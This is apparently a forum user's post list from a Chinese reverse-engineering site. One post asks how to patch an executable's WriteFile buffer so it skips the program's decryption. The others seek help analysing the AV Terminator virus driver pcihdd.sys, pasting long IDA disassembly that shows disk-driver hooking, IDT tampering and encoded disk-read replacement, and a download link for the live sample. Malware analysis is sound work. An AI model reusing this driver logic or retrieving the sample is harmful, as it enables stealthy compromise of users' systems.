|
[注意]这代码如何修改能将WriteFile函数的参数修改为指定的某块区域?
我再表述一下我的目的! 我现在手上有一个程序,比如a.exe,a.exe在执行的过程中会调用上述那一段代码来执行写操作,写的对象就是另外一个数据文件,假设为b.dat;写的内容就是a.exe在WriteFile函数之前申请的内存空间,大小为调用WriteFile函数参数指定的大小,内容是通过读取自身指定数据段并通过一系列解密生成的. 我现在的目的是想绕过其解密这一块,修改其在WriteFile函数中buffer的指针,指向我准备写入的内容. 我的问题也在这里,这个准备写入的内容我应该怎么组织,我目前的想法是通过PE工具在这个程序的数据段增加我准备写入大小的0字段,并用我准备写入的数据填充它,然后在WriteFile函数中直接将我增加的内容的指针提交给函数,不知道这样能否行~ 请各位大大,赐教! |
|
|
|
[求助]如何跟踪sys驱动文件,高手给点头绪!
; Segment type: Pure code ; Segment permissions: Read/Write/Execute INIT segment para public 'CODE' use32 assume cs:INIT ;org 400CF0h assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing dd 0D18h, 2 dup(0) dd 0E7Ah, 840h, 5 dup(0) dd 0D54h, 0D68h, 0D80h, 0DA0h, 0DB6h, 0DCAh dd 0DE6h, 0DFEh, 0E10h, 0E28h, 0E3Ah, 0E4Eh dd 0E5Ch, 0E6Eh, 0 db 61h ; a db 3, 52h, 74h s_Linitansistri db 'lInitAnsiString',0 db 50h ; P db 3, 52h, 74h s_Lfreeunicodes db 'lFreeUnicodeString',0 align 10h db 0FAh ; ú db 2, 52h, 74h s_Lansistringto db 'lAnsiStringToUnicodeString',0 align 10h db 0ABh ; « db 2, 4Fh, 62h s_Dereferenceob db 'DereferenceObject',0 dw 245h s_Mmisaddressva db 'MmIsAddressValid',0 align 2 dw 13Dh s_Iogetdeviceob db 'IoGetDeviceObjectPointer',0 align 2 dw 127h s_Iodeletesymbo db 'IoDeleteSymbolicLink',0 align 2 dw 125h s_Iodeletedevic db 'IoDeleteDevice',0 align 10h db 21h ; ! db 1, 49h, 6Fh s_Createsymboli db 'CreateSymbolicLink',0 align 4 dd 6F49011Bh, 61657243h, 65446574h, 65636976h dd 1180000h s_Iocompletereq db 'IoCompleteRequest',0 s_G db 'G',0 s_Exfreepool db 'ExFreePool',0 align 4 s_7 db '7',0 s_Exallocatepoo db 'ExAllocatePool',0 align 2 s_- db '-',0 s_Dbgprint db 'DbgPrint',0 align 2 s_Ntoskrnl_exe db 'ntoskrnl.exe',0 align 10h INIT ends end start |
|
[求助]如何跟踪sys驱动文件,高手给点头绪!
; Segment type: Pure data ; Segment permissions: Read/Write _data segment para public 'DATA' use32 assume cs:_data ;org 400880h ; char s_DevicePhysica[] s_DevicePhysica db '\Device\PhysicalHardDisk0',0 ; char s_DosdevicesPhy[] s_DosdevicesPhy db '\DosDevices\PhysicalHardDisk0',0 ; char SourceString[] SourceString db '\Device\Harddisk0\DR0',0 dword_4008CE dd 0 dword_4008D2 dd 0 dword_4008D6 dd 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 db 0 dword_400CD6 dd 0 ; PVOID P P dd 0 ; SIZE_T NumberOfBytes NumberOfBytes dd 0 qword_400CE2 dq 3025000000000000h db 38h ; 8 db 58h ; X db 0 db 0 db 0 db 0 _data ends ; Section 4. (virtual address 00000CF0) ; Virtual size : 00000198 ( 408.) ; Section size in file : 000001A0 ( 416.) ; Offset to raw data for section: 00000CF0 ; Flags E2000020: Text Discardable Executable Readable Writable ; Alignment : default |
|
[求助]如何跟踪sys驱动文件,高手给点头绪!
; Attributes: bp-based frame sub_40064D proc near SourceString= STRING ptr -10h UnicodeString= UNICODE_STRING ptr -8 arg_0= dword ptr 8 push ebp mov ebp, esp add esp, 0FFFFFFF0h push edi push esi push ebx pusha cmp P, 0 jz short loc_40066B push P ; P call ExFreePool loc_40066B: cmp [ebp+arg_0], 0 jz short loc_4006B7 push offset s_DosdevicesPhy ; "\\DosDevices\\PhysicalHardDisk0" lea eax, [ebp+SourceString] push eax ; DestinationString call RtlInitAnsiString push 1 ; AllocateDestinationString lea eax, [ebp+SourceString] push eax ; SourceString lea eax, [ebp+UnicodeString] push eax ; DestinationString call RtlAnsiStringToUnicodeString lea eax, [ebp+UnicodeString] push eax ; SymbolicLinkName call IoDeleteSymbolicLink lea eax, [ebp+UnicodeString] push eax ; UnicodeString call RtlFreeUnicodeString mov edi, [ebp+arg_0] mov esi, [edi+4] jmp short loc_4006B3 loc_4006A8: mov edi, [esi+0Ch] push esi ; DeviceObject call IoDeleteDevice mov esi, edi loc_4006B3: or esi, esi jnz short loc_4006A8 loc_4006B7: popa pop ebx pop esi pop edi leave retn 4 sub_40064D endp ; Attributes: bp-based frame ; int __stdcall start(PDRIVER_OBJECT DriverObject,int) public start start proc near var_20= dword ptr -20h SourceString= STRING ptr -1Ch DeviceObject= dword ptr -14h SymbolicLinkName= UNICODE_STRING ptr -10h UnicodeString= UNICODE_STRING ptr -8 DriverObject= dword ptr 8 push ebp mov ebp, esp add esp, 0FFFFFFE0h push edi push esi push ebx pusha nop nop call sub_4004B7 call sub_400451 or eax, eax jz short loc_40071F mov ecx, eax lea eax, [ebp+var_20] push eax push 3E8h push 3E8h push ecx call sub_4003B7 or eax, eax jz short loc_40071F mov NumberOfBytes, eax push NumberOfBytes ; NumberOfBytes push 0 ; PoolType call ExAllocatePool mov P, eax jmp short $+2 mov edi, P mov esi, [ebp+var_20] mov ecx, NumberOfBytes rep movsb jmp short loc_40072A loc_40071F: popa xor eax, eax dec eax pop ebx pop esi pop edi leave retn 8 loc_40072A: jmp short $+2 mov eax, [ebp+DriverObject] mov dword ptr [eax+34h], offset sub_40064D lea edi, [eax+38h] lea eax, sub_400518 mov [edi], eax mov [edi+8], eax mov [edi+38h], eax push offset s_DevicePhysica ; "\\Device\\PhysicalHardDisk0" lea eax, [ebp+SourceString] push eax ; DestinationString call RtlInitAnsiString push 1 ; AllocateDestinationString lea eax, [ebp+SourceString] push eax ; SourceString lea eax, [ebp+UnicodeString] push eax ; DestinationString call RtlAnsiStringToUnicodeString push offset s_DosdevicesPhy ; "\\DosDevices\\PhysicalHardDisk0" lea eax, [ebp+SourceString] push eax ; DestinationString call RtlInitAnsiString push 1 ; AllocateDestinationString lea eax, [ebp+SourceString] push eax ; SourceString lea eax, [ebp+SymbolicLinkName] push eax ; DestinationString call RtlAnsiStringToUnicodeString lea eax, [ebp+DeviceObject] push eax ; DeviceObject push 0 ; Exclusive push 0 ; DeviceCharacteristics push 15h ; DeviceType lea eax, [ebp+UnicodeString] push eax ; DeviceName push 0 ; DeviceExtensionSize push [ebp+DriverObject] ; DriverObject call IoCreateDevice or eax, eax jz short loc_40079F jmp short loc_4007C9 loc_40079F: lea eax, [ebp+UnicodeString] push eax ; DeviceName lea eax, [ebp+SymbolicLinkName] push eax ; SymbolicLinkName call IoCreateSymbolicLink or eax, eax jz short loc_4007C9 mov edi, [ebp+DriverObject] mov esi, [edi+4] jmp short loc_4007C3 loc_4007B8: mov edi, [esi+0Ch] push esi ; DeviceObject call IoDeleteDevice mov esi, edi loc_4007C3: or esi, esi jnz short loc_4007B8 jmp short $+2 loc_4007C9: lea eax, [ebp+UnicodeString] push eax ; UnicodeString call RtlFreeUnicodeString lea eax, [ebp+SymbolicLinkName] push eax ; UnicodeString call RtlFreeUnicodeString popa xor eax, eax pop ebx pop esi pop edi leave retn 8 start endp align 2 ; [00000006 BYTES: COLLAPSED FUNCTION RtlInitAnsiString. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION RtlFreeUnicodeString. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION RtlAnsiStringToUnicodeString. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION ObDereferenceObject. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION MmIsAddressValid. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoGetDeviceObjectPointer. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoDeleteSymbolicLink. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoDeleteDevice. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoCreateSymbolicLink. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoCreateDevice. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION IoCompleteRequest. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION ExFreePool. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION ExAllocatePool. PRESS KEYPAD "+" TO EXPAND] ; [00000006 BYTES: COLLAPSED FUNCTION DbgPrint. PRESS KEYPAD "+" TO EXPAND] align 10h _text ends ; Section 2. (virtual address 00000840) ; Virtual size : 0000003C ( 60.) ; Section size in file : 00000040 ( 64.) ; Offset to raw data for section: 00000840 ; Flags 48000040: Data Not pageable Readable ; Alignment : default ; ; Imports from ntoskrnl.exe ; ; Segment type: Externs ; _idata ; void __stdcall RtlInitAnsiString(PANSI_STRING DestinationString,PCSZ SourceString) extrn __imp_RtlInitAnsiString:dword ; void __stdcall RtlFreeUnicodeString(PUNICODE_STRING UnicodeString) extrn __imp_RtlFreeUnicodeString:dword ; NTSTATUS __stdcall RtlAnsiStringToUnicodeString(PUNICODE_STRING DestinationString,PANSI_STRING SourceString,BOOLEAN AllocateDestinationString) extrn __imp_RtlAnsiStringToUnicodeString:dword extrn __imp_ObDereferenceObject:dword ; BOOLEAN __stdcall MmIsAddressValid(PVOID VirtualAddress) extrn __imp_MmIsAddressValid:dword ; NTSTATUS __stdcall IoGetDeviceObjectPointer(PUNICODE_STRING ObjectName,ACCESS_MASK DesiredAccess,PFILE_OBJECT *FileObject,PDEVICE_OBJECT *DeviceObject) extrn __imp_IoGetDeviceObjectPointer:dword ; NTSTATUS __stdcall IoDeleteSymbolicLink(PUNICODE_STRING SymbolicLinkName) extrn __imp_IoDeleteSymbolicLink:dword ; void __stdcall IoDeleteDevice(PDEVICE_OBJECT DeviceObject) extrn __imp_IoDeleteDevice:dword ; NTSTATUS __stdcall IoCreateSymbolicLink(PUNICODE_STRING SymbolicLinkName,PUNICODE_STRING DeviceName) extrn __imp_IoCreateSymbolicLink:dword ; NTSTATUS __stdcall IoCreateDevice(PDRIVER_OBJECT DriverObject,ULONG DeviceExtensionSize,PUNICODE_STRING DeviceName,ULONG DeviceType,ULONG DeviceCharacteristics,BOOLEAN Exclusive,PDEVICE_OBJECT *DeviceObject) extrn __imp_IoCreateDevice:dword extrn __imp_IoCompleteRequest:dword ; void __stdcall ExFreePool(PVOID P) extrn __imp_ExFreePool:dword ; PVOID __stdcall ExAllocatePool(POOL_TYPE PoolType,SIZE_T NumberOfBytes) extrn __imp_ExAllocatePool:dword ; ULONG DbgPrint(PCH Format,...) extrn __imp_DbgPrint:dword ; Segment type: Pure data ; Segment permissions: Read _rdata segment para public 'DATA' use32 assume cs:_rdata ;org 40087Ch align 10h _rdata ends ; Section 3. (virtual address 00000880) ; Virtual size : 0000046D ( 1133.) ; Section size in file : 00000470 ( 1136.) ; Offset to raw data for section: 00000880 ; Flags C8000040: Data Not pageable Readable Writable ; Alignment : default |
|
[求助]如何跟踪sys驱动文件,高手给点头绪!
; Attributes: bp-based frame sub_4003B7 proc near var_8= dword ptr -8 var_4= dword ptr -4 arg_0= dword ptr 8 arg_4= dword ptr 0Ch arg_8= dword ptr 10h arg_C= dword ptr 14h push ebp mov ebp, esp add esp, 0FFFFFBF8h pusha xor eax, eax mov [ebp+var_4], eax mov edi, [ebp+arg_0] mov edi, [edi+3Ch] add edi, [ebp+arg_0] mov ecx, [edi+8Ch] or ecx, ecx jz short loc_400449 mov eax, [edi+88h] add eax, [ebp+arg_0] mov [ebp+var_8], eax push eax ; VirtualAddress call MmIsAddressValid or eax, eax jnz short loc_4003F1 jmp short loc_400449 loc_4003F1: mov esi, [ebp+var_8] mov cx, [esi+0Ch] add cx, [esi+0Eh] movzx ecx, cx add esi, 10h jmp short loc_400444 loc_400404: push ecx mov ebx, [esi+4] test ebx, 80000000h jz short loc_40043F and ebx, 7FFFFFFFh add ebx, [ebp+var_8] mov eax, [esi] test eax, 80000000h jnz short loc_40043F cmp eax, [ebp+arg_8] jnz short loc_40043F push [ebp+arg_C] push [ebp+arg_4] push ebx push [ebp+var_8] push [ebp+arg_0] call sub_400346 mov [ebp+var_4], eax pop ecx jmp short loc_400449 loc_40043F: add esi, 8 pop ecx dec ecx loc_400444: cmp ecx, 0 ja short loc_400404 loc_400449: popa mov eax, [ebp+var_4] leave retn 10h sub_4003B7 endp ; Attributes: bp-based frame sub_400451 proc near var_4= dword ptr -4 push ebp mov ebp, esp add esp, 0FFFFFFFCh pusha mov [ebp+var_4], 0 loc_40045F: lea ebx, loc_40045F and ebx, 0FFFFFC00h loc_40046B: ; VirtualAddress push ebx call MmIsAddressValid or eax, eax jz short loc_4004B1 cmp ebx, 80000000h jbe short loc_4004B1 cmp word ptr [ebx], 5A4Dh jnz short loc_4004A9 mov edi, ebx add edi, [ebx+3Ch] push edi ; VirtualAddress call MmIsAddressValid or eax, eax jz short loc_40049F cmp word ptr [edi], 4550h jnz short loc_40049F mov [ebp+var_4], ebx jmp short loc_4004B1 loc_40049F: sub ebx, 400h jmp short loc_40046B jmp short loc_4004B1 loc_4004A9: sub ebx, 400h jmp short loc_40046B loc_4004B1: popa mov eax, [ebp+var_4] leave retn sub_400451 endp ; Attributes: bp-based frame sub_4004B7 proc near var_4= dword ptr -4 push ebp mov ebp, esp add esp, 0FFFFFFFCh pusha sidt qword_400CE2 mov esi, dword ptr qword_400CE2+2 mov eax, 9 shl eax, 3 add esi, eax movzx eax, word ptr [esi+6] shl eax, 10h mov ax, [esi] and eax, 0FF000000h mov [ebp+var_4], eax sub eax, eax jz short loc_400515 mov esi, dword ptr qword_400CE2+2 mov eax, 0Eh shl eax, 3 add esi, eax movzx eax, word ptr [esi+6] shl eax, 10h mov ax, [esi] and eax, 0FF000000h cmp eax, [ebp+var_4] jz short loc_400515 mov word ptr [esi+6], 0 loc_400515: popa leave retn sub_4004B7 endp ; Attributes: bp-based frame sub_400518 proc near UnicodeString= UNICODE_STRING ptr -24h SourceString= STRING ptr -1Ch FileObject= dword ptr -8 DeviceObject= dword ptr -4 arg_4= dword ptr 0Ch push ebp mov ebp, esp add esp, 0FFFFFFDCh push edi push esi push ebx mov edi, [ebp+arg_4] mov dword ptr [edi+1Ch], 0 mov dword ptr [edi+18h], 0 mov esi, [edi+60h] movzx eax, byte ptr [esi] or eax, eax jnz short loc_4005B0 jmp short $+2 push offset SourceString ; "\\Device\\Harddisk0\\DR0" lea eax, [ebp+SourceString] push eax ; DestinationString call RtlInitAnsiString push 1 ; AllocateDestinationString lea eax, [ebp+SourceString] push eax ; SourceString lea eax, [ebp+UnicodeString] push eax ; DestinationString call RtlAnsiStringToUnicodeString xor eax, eax mov [ebp+FileObject], eax mov [ebp+DeviceObject], eax lea eax, [ebp+DeviceObject] push eax ; DeviceObject lea eax, [ebp+FileObject] push eax ; FileObject push 80h ; DesiredAccess lea eax, [ebp+UnicodeString] push eax ; ObjectName call IoGetDeviceObjectPointer mov eax, [ebp+FileObject] jmp short $+2 mov eax, [eax+4] mov dword_4008CE, eax cmp dword ptr [eax+10h], 0 jz short loc_40059A jmp short $+2 mov ecx, [eax+10h] xchg ecx, dword_4008D2 mov [eax+10h], ecx loc_40059A: push [ebp+FileObject] call ObDereferenceObject lea eax, [ebp+UnicodeString] push eax ; UnicodeString call RtlFreeUnicodeString jmp loc_400637 loc_4005B0: cmp eax, 2 jnz short loc_4005CD mov eax, dword_4008CE or eax, eax jz short loc_400637 mov ecx, dword_4008D2 or ecx, ecx jz short loc_4005CB mov [eax+10h], ecx loc_4005CB: jmp short loc_400637 loc_4005CD: cmp eax, 0Eh jnz short loc_400637 mov eax, [esi+0Ch] cmp eax, 0F0003C04h jnz short loc_400637 call sub_4002B0 mov ebx, [edi+0Ch] mov ecx, [esi+8] call sub_4002DA mov dword_400CD6, eax push dword_400CD6 push (offset qword_400CE2+6) ; Format call DbgPrint add esp, 8 mov eax, [esi+4] cmp eax, NumberOfBytes jbe short loc_400637 mov edi, [edi+3Ch] mov esi, P mov ecx, NumberOfBytes shr ecx, 2 loc_400621: lodsd xor eax, dword_400CD6 stosd dec ecx jnz short loc_400621 mov ecx, NumberOfBytes and ecx, 3 rep movsb loc_400637: push 0 push [ebp+arg_4] call IoCompleteRequest mov eax, 0 pop ebx pop esi pop edi leave retn 8 sub_400518 endp |
|
[求助]如何跟踪sys驱动文件,高手给点头绪!
这个AV终结者病毒就是通过这个pcihdd.sys驱动来进行破坏的~ 以下是IDA反汇编出来的代码: ; ; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º This file is generated by The Interactive Disassembler (IDA) º ; º Copyright (c) 2006 by DataRescue sa/nv, <ida@datarescue.com> º ; º Licensed to: Paul Ashton - Blue Lane Technologies (1-user Advanced 03/2006) º%s ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ; ; Input MD5 : 289345E696BBDE6C2C6ABA2D5E506D23 ; File Name : D:\1\pcihdd.sys ; Format : Portable executable for 80386 (PE) ; Imagebase : 400000 ; Section 1. (virtual address 000002B0) ; Virtual size : 0000058A ( 1418.) ; Section size in file : 00000590 ( 1424.) ; Offset to raw data for section: 000002B0 ; Flags 68000020: Text Not pageable Executable Readable ; Alignment : default .686p .mmx .model flat ; Segment type: Pure code ; Segment permissions: Read/Execute _text segment para public 'CODE' use32 assume cs:_text ;org 4002B0h assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing sub_4002B0 proc near jmp short $+2 mov ecx, 100h mov edx, 0CCECC9B1h loc_4002BC: lea eax, [ecx-1] push ecx mov ecx, 8 loc_4002C5: shr eax, 1 jnb short loc_4002CB xor eax, edx loc_4002CB: dec ecx jnz short loc_4002C5 pop ecx mov dword_4008D2[ecx*4], eax dec ecx jnz short loc_4002BC retn sub_4002B0 endp sub_4002DA proc near jmp short $+2 mov eax, 0FFFFFFFFh or ebx, ebx jz short loc_4002FA loc_4002E5: mov dl, [ebx] xor dl, al movzx edx, dl shr eax, 8 xor eax, dword_4008D6[edx*4] inc ebx dec ecx jnz short loc_4002E5 loc_4002FA: not eax retn sub_4002DA endp ; Attributes: bp-based frame sub_4002FD proc near var_4= dword ptr -4 arg_0= dword ptr 8 arg_4= dword ptr 0Ch arg_8= dword ptr 10h arg_C= dword ptr 14h push ebp mov ebp, esp add esp, 0FFFFFBFCh pusha xor eax, eax mov [ebp+var_4], eax mov esi, [ebp+arg_8] mov cx, [esi+0Ch] add cx, [esi+0Eh] movzx ecx, cx add esi, 10h cmp ecx, 0 jbe short loc_40033E mov ebx, [esi+4] and ebx, 7FFFFFFFh add ebx, [ebp+arg_4] mov eax, [ebx] add eax, [ebp+arg_0] mov ecx, [ebp+arg_C] mov [ecx], eax mov ecx, [ebx+4] mov [ebp+var_4], ecx loc_40033E: popa mov eax, [ebp+var_4] leave retn 10h sub_4002FD endp ; Attributes: bp-based frame sub_400346 proc near var_4= dword ptr -4 arg_0= dword ptr 8 arg_4= dword ptr 0Ch arg_8= dword ptr 10h arg_C= dword ptr 14h arg_10= dword ptr 18h push ebp mov ebp, esp add esp, 0FFFFFBFCh pusha xor eax, eax mov [ebp+var_4], eax mov esi, [ebp+arg_8] mov cx, [esi+0Ch] add cx, [esi+0Eh] movzx ecx, cx add esi, 10h jmp short loc_4003AA loc_400368: push ecx mov ebx, [esi+4] test ebx, 80000000h jz short loc_4003A5 and ebx, 7FFFFFFFh add ebx, [ebp+arg_4] mov edx, [esi] test edx, 80000000h jnz short loc_4003A5 cmp edx, [ebp+arg_C] jnz short loc_4003A5 push [ebp+arg_10] push ebx push [ebp+arg_4] push [ebp+arg_0] call sub_4002FD mov [ebp+var_4], eax or eax, eax jz short loc_4003A5 pop ecx jmp short loc_4003AF loc_4003A5: add esi, 8 pop ecx dec ecx loc_4003AA: cmp ecx, 0 ja short loc_400368 loc_4003AF: popa mov eax, [ebp+var_4] leave retn 14h sub_400346 endp |
|
[讨论]Av终结者病毒使用的新壳,两天毫无头绪,大家帮忙看看,分析下!
病毒最终生成了pcihdd.sys文件,然后注册成服务,然后服务讲pcihdd.sys写入到userinit.exe文件中,现在破解到pcihdd.sys中了,但是sys驱动我一窍不通,谁给点头绪吧~ 以下是病毒生成的驱动文件的下载地址: http://www.vupig.com.cn/disk.sys |
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值